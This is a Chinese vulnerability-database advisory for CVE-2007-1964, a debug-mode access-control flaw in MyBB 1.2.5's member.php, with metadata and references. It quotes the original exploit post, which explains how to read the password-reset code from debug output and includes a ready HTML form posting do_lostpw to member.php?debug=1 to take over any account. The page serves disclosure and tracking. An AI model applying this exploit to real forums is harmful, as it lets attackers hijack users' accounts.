MyBB debug模式'member.php' 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191030 漏洞类型 未知
发布时间 2007-04-11 更新时间 2007-04-11
CVE编号 CVE-2007-1964 CNNVD-ID CNNVD-200704-201
漏洞平台 N/A CVSS评分 6.0
|漏洞来源
https://www.securityfocus.com/bid/86347
https://cxsecurity.com/issue/WLB-2007040051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-201
|漏洞详情
当debug模式可用时,MyBB(又称MyBulletinBoard)中的member.php存在权限许可和访问控制漏洞。远程认证用户可以通过在对do_lostpw操作的debug请求中提供账户的注册电子邮箱地址,更改任意账户的密码。
|漏洞EXP
Hello,,

Mybb Change Password Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]

If You Can Use the debug mode you will be able to change the password for and user by knowing the registered email address
Enter the email in the html code below after changing the website and mybb_dir to true variables then enter any user email address

Look at the query number 12 or search for awaitingactivation you will find like
INSERT INTO mybb123_awaitingactivation (uid, dateline, code, type) VALUES ('1', 'XXXX', 'ADbSXnoM', 'p')

--- >> ('1', 'XXXX', 'ADbSXnoM', 'p')
 1 is the userid , XXXX is the time , 
 ADbSXnoM' is the change password verification code ,
 'p' is the type which is password change

<<<HTM EXPLOIT
<form action="http://website/mybb_dir/member.php?debug=1" method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td wlign=center>
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>
>>>

GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;

End of it :)
WwW.SoQoR.NeT
|受影响的产品
MyBulletinBoard MyBulletinBoard 1.2.5 MyBB MyBB 1.2.5
|参考资料

来源:BUGTRAQ
名称:20070330MybbChangePasswordVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464267/100/100/threaded
来源:SREASON
名称:2544
链接:http://securityreason.com/securityalert/2544